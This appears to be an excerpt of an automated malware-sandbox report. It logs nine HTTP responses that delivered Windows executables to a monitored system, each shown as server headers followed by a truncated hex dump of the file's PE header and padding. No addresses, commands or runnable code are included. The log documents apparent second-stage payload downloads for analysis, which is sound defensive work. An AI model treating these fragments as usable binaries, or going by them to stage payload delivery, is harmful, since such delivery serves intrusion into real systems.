Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 06 Sep 2024 06:17:14 GMTContent-Type: application/octet-streamContent-Length: 3607496Last-Modified: Thu, 05 Sep 2024 10:40:39 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d98aa7-370bc8"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 38 06 b7 aa 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 5c 26 00 00 ea 0f 00 00 00 00 00 2e 7a 26 00 00 20 00 00 00 80 26 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 36 00 00 04 00 00 86 d4 37 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 e0 79 26 00 4b 00 00 00 00 a0 26 00 94 e2 0f 00 00 00 00 00 00 00 00 00 00 4a 36 00 c8 c1 00 00 00 a0 36 00 0c 00 00 00 90 79 26 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 5a 26 00 00 20 00 00 00 5c 26 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 18 02 00 00 00 80 26 00 00 04 00 00 00 60 26 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 94 e2 0f 00 00 a0 26 00 00 e4 0f 00 00 64 26 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 36 00 00 02 00 00 00 48 36 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 06 Sep 2024 06:17:17 GMTContent-Type: application/octet-streamContent-Length: 8684256Last-Modified: Tue, 03 Sep 2024 13:26:30 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d70e86-8482e0"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 a8 b8 50 f6 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 08 80 00 00 9e 03 00 00 00 00 00 ce 26 80 00 00 20 00 00 00 40 80 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 84 00 00 04 00 00 49 b2 84 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 80 26 80 00 4b 00 00 00 00 60 80 00 d6 97 03 00 00 00 00 00 00 00 00 00 00 aa 83 00 e0 d8 00 00 00 00 84 00 0c 00 00 00 36 26 80 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 06 80 00 00 20 00 00 00 08 80 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 a0 02 00 00 00 40 80 00 00 04 00 00 00 0c 80 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d6 97 03 00 00 60 80 00 00 98 03 00 00 10 80 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 84 00 00 02 00 00 00 a8 83 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Sep 2024 06:17:38 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 
00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Sep 2024 06:17:43 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Sep 2024 06:17:45 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 
73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Sep 2024 06:17:46 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 
00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Sep 2024 06:17:46 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 
72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Sep 2024 06:17:48 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: [hex dump of the returned PE image (MZ header) omitted]
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 06 Sep 2024 06:17:49 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: [hex dump of the returned PE image (MZ header) omitted]
